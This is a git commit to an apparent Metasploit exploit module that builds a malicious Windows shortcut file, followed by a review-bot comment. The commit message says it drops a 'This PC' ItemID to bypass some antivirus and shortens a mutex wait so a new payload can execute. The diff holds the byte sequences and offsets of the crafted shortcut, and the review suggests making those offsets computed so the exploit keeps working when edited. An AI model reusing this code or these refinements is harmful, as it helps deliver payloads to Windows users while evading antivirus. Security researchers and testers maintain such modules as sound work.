Removed This PC ItemID & increased timeout in WaitForSingleObject

Remove the This PC ItemID to bypass (some) AV.

Timeout for WaitForSingleObject is set to 2,5s. After this timeout the
mutex is released, allowing a new payload to be executed.
bug/bundler_fix
Yorick Koster 2017-07-27 20:14:50 +02:00 committed by Brent Cook
parent e6e94bad4b
commit 46ec04dd15
3 changed files with 2 additions and 9 deletions


@ -145,16 +145,9 @@ class MetasploitModule < Msf::Exploit::Remote
idlist_data = ''
# ItemID = ItemIDSize (2 bytes) + Data (variable)
idlist_data << [0x12 + 2].pack('v')
idlist_data << [
# This PC
0x1f, 0x50, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30,
0x30, 0x9d
].pack('C*')
# ItemID = ItemIDSize (2 bytes) + Data (variable)
idlist_data << [0x12 + 2].pack('v')
idlist_data << [
# All Control Panel Items
0x2e, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,
0x1f, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,
0x30, 0x9d
].pack('C*')
# ItemID = ItemIDSize (2 bytes) + Data (variable)
@ -172,7 +165,7 @@ class MetasploitModule < Msf::Exploit::Remote
0x10, 0x00, 0x00, 0x00, # BlockSize
0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005
0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\Control Panel)
0x28, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList
0x14, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList
].pack('C*')
# TerminalBlock
ret << [0x00, 0x00, 0x00, 0x00].pack('V')
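Review bot: The `0x14, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList` entry in the second hunk is a hand-maintained magic value that has to equal the byte length of the ItemIDs preceding the one the SpecialFolderDataBlock refers to, and this commit shows exactly how fragile that is: it was edited from 0x28 to 0x14 because a 0x12+2-byte ItemID was dropped in the first hunk, with nothing in the code tying the two together. I would capture the offset where idlist_data is built, `special_folder_offset = idlist_data.bytesize` just before the ItemID the block points to is appended (presumably the one after the `# ItemID = ItemIDSize (2 bytes) + Data (variable)` comment that ends the first hunk, which I cannot see), close the `ret << [ ... ].pack('C*')` array after the SpecialFolderID line, and emit `ret << [special_folder_offset].pack('V') # Offset in LinkTargetIDList`, so removing or adding an ItemID can no longer silently desynchronise the data block. In the first hunk the surviving Control Panel line starts with 0x1f where the removed line started with 0x2e, and no comment says why the leading byte changed; a one-line comment on that line, e.g. `# leading byte changed now that this is the first (root-level) ItemID — see git history`, would spare the next reader a diff archaeology session. Both hunks sit inside a method that starts and ends outside the hunks.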